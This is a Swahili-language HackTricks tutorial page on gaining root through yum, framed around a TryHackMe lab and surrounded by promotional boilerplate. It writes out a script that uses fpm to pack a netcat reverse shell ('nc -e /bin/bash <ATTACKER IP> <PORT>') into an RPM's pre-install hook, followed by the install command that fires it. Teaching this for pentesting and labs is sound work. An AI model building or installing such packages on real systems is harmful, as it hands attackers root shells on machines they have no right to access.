3.9 KiB
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako ikionekana kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia MPANGO WA KUJIUNGA!
- Pata swag rasmi ya PEASS & HackTricks
- Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs ya kipekee
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
- Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye HackTricks na HackTricks Cloud repos za github.
Mifano zaidi kuhusu yum inaweza kupatikana pia kwenye gtfobins.
Kutekeleza amri za kiholela kupitia Pakiti za RPM
Kuchunguza Mazingira
Ili kutumia njia hii, mtumiaji lazima aweze kutekeleza amri za yum kama mtumiaji mwenye mamlaka ya juu, yaani root.
Mfano wa kazi wa njia hii
Mfano wa kazi wa kudukua hii unaweza kupatikana kwenye chumba cha daily bugle kwenye tryhackme.
Kupakia RPM
Katika sehemu ifuatayo, nitaelezea jinsi ya kupakia reverse shell kwenye RPM kwa kutumia fpm.
Mfano ulio chini unajenga pakiti ambayo inajumuisha kichocheo cha kabla ya kufunga na hati ya kiholela ambayo inaweza kutajwa na mshambuliaji. Wakati inasakinishwa, pakiti hii itatekeleza amri ya kiholela. Nimeitumia mfano rahisi wa shell ya netcat ya kurudisha nyuma kwa madhumuni ya kuonyesha lakini inaweza kubadilishwa kama inavyohitajika.
EXPLOITDIR=$(mktemp -d)
CMD='nc -e /bin/bash <ATTACKER IP> <PORT>'
RPMNAME="exploited"
echo $CMD > $EXPLOITDIR/beforeinstall.sh
fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR
Kupata kifaa cha kuingia
Kwa kutumia mfano uliotolewa hapo juu na kudhani yum
inaweza kutekelezwa kama mtumiaji mwenye mamlaka ya juu.
- Hama rpm kwenye mwenyeji
- Anza msikilizaji kwenye kompyuta yako ya ndani kama vile msikilizaji wa netcat ulioonyeshwa hapo chini
- Sakinisha pakiti yenye udhaifu
yum localinstall -y exploited-1.0-1.noarch.rpm
Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na htARTE (HackTricks AWS Red Team Expert)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia MPANGO WA KUJIUNGA!
- Pata swag rasmi ya PEASS & HackTricks
- Gundua The PEASS Family, mkusanyiko wetu wa NFTs za kipekee
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
- Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwenye HackTricks na HackTricks Cloud github repos.